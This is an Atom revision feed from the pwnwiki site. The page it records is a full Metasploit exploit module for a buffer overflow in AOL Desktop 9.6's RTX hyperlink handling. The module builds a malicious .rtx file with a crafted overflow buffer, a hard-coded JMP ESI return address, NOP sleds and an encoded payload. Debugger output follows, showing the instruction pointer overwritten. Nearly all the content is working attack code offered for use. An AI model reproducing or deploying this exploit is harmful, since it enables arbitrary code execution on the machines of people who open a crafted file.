<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=AOL_Desktop_9.6_RTX%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>AOL Desktop 9.6 RTX緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=AOL_Desktop_9.6_RTX%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=AOL_Desktop_9.6_RTX%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-07T19:55:30Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=AOL_Desktop_9.6_RTX%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=692&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; ## # $Id: aol_desktop_linktag.rb 12284 2011-04-08 23:09:31Z sinn3r $ ##  ## # This file is part of the Metasploit Framework and may be subject to # redistributio...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=AOL_Desktop_9.6_RTX%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=692&amp;oldid=prev"/>
		<updated>2021-03-27T02:58:33Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; ## # $Id: aol_desktop_linktag.rb 12284 2011-04-08 23:09:31Z sinn3r $ ##  ## # This file is part of the Metasploit Framework and may be subject to # redistributio...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
##&lt;br /&gt;
# $Id: aol_desktop_linktag.rb 12284 2011-04-08 23:09:31Z sinn3r $&lt;br /&gt;
##&lt;br /&gt;
&lt;br /&gt;
##&lt;br /&gt;
# This file is part of the Metasploit Framework and may be subject to&lt;br /&gt;
# redistribution and commercial restrictions. Please see the Metasploit&lt;br /&gt;
# Framework web site for more information on licensing and terms of use.&lt;br /&gt;
# http://metasploit.com/framework/&lt;br /&gt;
##&lt;br /&gt;
&lt;br /&gt;
require 'msf/core'&lt;br /&gt;
&lt;br /&gt;
class Metasploit3 &amp;lt; Msf::Exploit::Remote&lt;br /&gt;
	Rank = NormalRanking&lt;br /&gt;
&lt;br /&gt;
	include Msf::Exploit::FILEFORMAT&lt;br /&gt;
&lt;br /&gt;
	def initialize(info={})&lt;br /&gt;
		super(update_info(info,&lt;br /&gt;
			'Name'           =&amp;gt; &amp;quot;AOL Desktop 9.6 RTX Buffer Overflow&amp;quot;,&lt;br /&gt;
			'Description'    =&amp;gt; %q{&lt;br /&gt;
					This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct&lt;br /&gt;
				component. By supplying a long string of data in the hyperlink tag, rich.rct copies&lt;br /&gt;
				this data into a buffer using a strcpy function, which causes an overflow, and&lt;br /&gt;
				results arbitritray code execution.&lt;br /&gt;
			},&lt;br /&gt;
			'License'	     =&amp;gt; MSF_LICENSE,&lt;br /&gt;
			'Version'	     =&amp;gt; &amp;quot;$Revision: 12284 $&amp;quot;,&lt;br /&gt;
			'Author'         =&amp;gt;&lt;br /&gt;
				[&lt;br /&gt;
					'sup3r',     #Initial disclosure, poc (9.5)&lt;br /&gt;
					'sickn3ss',  #9.6 poc&lt;br /&gt;
					'sinn3r',    #Metasploit&lt;br /&gt;
				],&lt;br /&gt;
			'References'     =&amp;gt;&lt;br /&gt;
				[&lt;br /&gt;
					[ 'OSVDB', '70741'],&lt;br /&gt;
					[ 'URL', 'http://www.exploit-db.com/exploits/16085/' ],&lt;br /&gt;
				],&lt;br /&gt;
			'Payload'	     =&amp;gt;&lt;br /&gt;
				{&lt;br /&gt;
					'BadChars' =&amp;gt; &amp;quot;\x00\x0d\x0a\x3e\x7f&amp;quot;,&lt;br /&gt;
					'StackAdjustment' =&amp;gt; -3500,&lt;br /&gt;
				},&lt;br /&gt;
			'DefaultOptions' =&amp;gt;&lt;br /&gt;
				{&lt;br /&gt;
					'ExitFunction' =&amp;gt; &amp;quot;process&amp;quot;,&lt;br /&gt;
				},&lt;br /&gt;
			'Platform'       =&amp;gt; 'win',	&lt;br /&gt;
			'Targets'	     =&amp;gt;&lt;br /&gt;
				[&lt;br /&gt;
					[&lt;br /&gt;
						'AOL Desktop 9.6 on Windows XP SP3',&lt;br /&gt;
						{&lt;br /&gt;
							'Ret'=&amp;gt;0x01DB4542,  #0x01DB4542 JMP ESI&lt;br /&gt;
							'Offset'=&amp;gt;5391,     #Offset to EIP&lt;br /&gt;
							'Max'=&amp;gt;8000,        #Buffer max. Can be more.&lt;br /&gt;
						},&lt;br /&gt;
					],&lt;br /&gt;
				],&lt;br /&gt;
			'Privileged'	 =&amp;gt; false,&lt;br /&gt;
			'DisclosureDate' =&amp;gt; &amp;quot;Jan 31 2011&amp;quot;,&lt;br /&gt;
			'DefaultTarget'  =&amp;gt; 0))&lt;br /&gt;
&lt;br /&gt;
			register_options(&lt;br /&gt;
				[&lt;br /&gt;
					OptString.new( 'FILENAME', [false, 'The filename', 'msf.rtx'] ),&lt;br /&gt;
				]&lt;br /&gt;
			)&lt;br /&gt;
	end&lt;br /&gt;
&lt;br /&gt;
	def exploit&lt;br /&gt;
&lt;br /&gt;
		# Compatible with what the poc has, and what I see on my debugger&lt;br /&gt;
		sploit  = ''&lt;br /&gt;
		sploit &amp;lt;&amp;lt; rand_text_alpha(4968+16)&lt;br /&gt;
		sploit &amp;lt;&amp;lt; payload.encoded&lt;br /&gt;
		sploit &amp;lt;&amp;lt; rand_text_alpha(5368-sploit.length)&lt;br /&gt;
		sploit &amp;lt;&amp;lt; make_nops(11)&lt;br /&gt;
		sploit &amp;lt;&amp;lt; &amp;quot;\xe9\x70\xfe\xff\xff&amp;quot;  #JMP back 400 bytes&lt;br /&gt;
		sploit &amp;lt;&amp;lt; [target.ret].pack('V')&lt;br /&gt;
		sploit &amp;lt;&amp;lt; make_nops(target['Offset']-sploit.length-2)&lt;br /&gt;
		sploit &amp;lt;&amp;lt; &amp;quot;\xeb\x04&amp;quot;&lt;br /&gt;
		sploit &amp;lt;&amp;lt; [target.ret].pack('V')&lt;br /&gt;
		sploit &amp;lt;&amp;lt; payload.encoded&lt;br /&gt;
		sploit &amp;lt;&amp;lt; rand_text_alpha(target['Max']-sploit.length)&lt;br /&gt;
&lt;br /&gt;
		link_value = rand_text_alpha(6)&lt;br /&gt;
&lt;br /&gt;
		rtx  = &amp;quot;&amp;lt;HTML&amp;gt;&amp;quot;&lt;br /&gt;
		rtx &amp;lt;&amp;lt; &amp;quot;&amp;lt;A HREF=\&amp;quot;#{sploit}\&amp;quot;&amp;gt;#{link_value}&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
		rtx &amp;lt;&amp;lt; &amp;quot;&amp;lt;/HTML&amp;gt;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
		print_status(&amp;quot;Creating #{datastore['FILENAME']}...&amp;quot;)&lt;br /&gt;
		file_create(rtx)&lt;br /&gt;
	end&lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
=begin&lt;br /&gt;
0:000&amp;gt; g&lt;br /&gt;
Breakpoint 0 hit&lt;br /&gt;
eax=00000006 ebx=06652370 ecx=02d9c898 edx=038d0000 esi=00000000 edi=02d99b30&lt;br /&gt;
eip=6909e187 esp=0022e638 ebp=0022e648 iopl=0         nv up ei pl nz na pe nc&lt;br /&gt;
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206&lt;br /&gt;
rich!ToolInit+0xed2c:&lt;br /&gt;
6909e187 e85cd50300      call    rich!ToolInit+0x4c28d (690db6e8)&lt;br /&gt;
0:000&amp;gt; g&lt;br /&gt;
(8d8.924): Access violation - code c0000005 (first chance)&lt;br /&gt;
First chance exceptions are reported before any exception handling.&lt;br /&gt;
This exception may be expected and handled.&lt;br /&gt;
eax=00000000 ebx=02d38358 ecx=00000000 edx=00000030 esi=02d53cb8 edi=0022e7c4&lt;br /&gt;
eip=43434343 esp=0022e760 ebp=0022e780 iopl=0         nv up ei pl nz na po nc&lt;br /&gt;
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202&lt;br /&gt;
43434343 ??              ???&lt;br /&gt;
0:000&amp;gt; dd esi&lt;br /&gt;
02d53cb8  43434343 43434343 43434343 43434343&lt;br /&gt;
02d53cc8  43434343 43434343 43434343 43434343&lt;br /&gt;
02d53cd8  43434343 43434343 43434343 43434343&lt;br /&gt;
02d53ce8  43434343 43434343 43434343 43434343&lt;br /&gt;
02d53cf8  43434343 43434343 43434343 43434343&lt;br /&gt;
02d53d08  43434343 43434343 43434343 43434343&lt;br /&gt;
02d53d18  43434343 43434343 43434343 43434343&lt;br /&gt;
02d53d28  43434343 43434343 43434343 43434343&lt;br /&gt;
=end&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>